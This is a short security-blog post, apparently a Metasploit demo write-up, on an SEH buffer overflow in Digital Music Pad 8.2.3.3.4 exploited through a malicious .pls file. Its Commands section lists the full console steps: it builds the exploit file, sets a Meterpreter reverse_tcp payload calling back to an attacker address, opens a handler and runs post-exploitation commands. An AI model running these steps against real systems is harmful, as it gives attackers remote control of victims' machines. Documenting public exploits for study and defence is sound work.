aka wow on ZATAZ.com
EDB-ID-15134 : Digital Music Pad SEH overflow
Timeline :
Vulnerability discovered and PoC disclosed on Exploit-DB by Abhishek Lyall the 2010-09-17
Metasploit PoC provided the 2010-10-03
PoC provided by :
Abhishek Lyall
Reference(s) :
Affected version(s) :
Digital Music Pad 8.2.3.3.4
Tested on Windows XP SP3 with :
Digital Music Pad 8.2.3.3.4
Description :
This module exploits a buffer overflow in Digital Music Pad Version 8.2.3.3.4 When opening a malicious pls file with the Digital Music Pad, a remote attacker could overflow a buffer and execute arbitrary code.
Commands :
use exploit/windows/fileformat/digital_music_pad_pls
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploituse exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -jsessions -i 1
sysinfo
getuid
ipconfig
I recommend you to read these related posts
- Metasploit Digital Music Pad SEH overflow demo censored as copyright infringement
- CVE-2010-3867 : ProFTPD IAC Remote Root Exploit
- CVE-2010-0304 : Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
- EDB-ID-16940 : Microsoft .NET Runtime Optimization Service Privilege Escalation
- Scada Sielco Sistemi Winlog Buffer Overflow 2.07.14 Metasploit Demo
- OSVDB-68514 : Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
- CVE-2011-0257 : Apple QuickTime PICT PnSize Buffer Overflow Metasploit demo
- CVE-2010-1297 : Adobe Flash Player newfunction Invalid Pointer Use
- CVE-2010-3765 : Mozilla Firefox Interleaving document.write and appendChild Exploit
- CVE-2010-3747 : RealNetworks RealPlayer CDDA URI Initialization Vulnerability
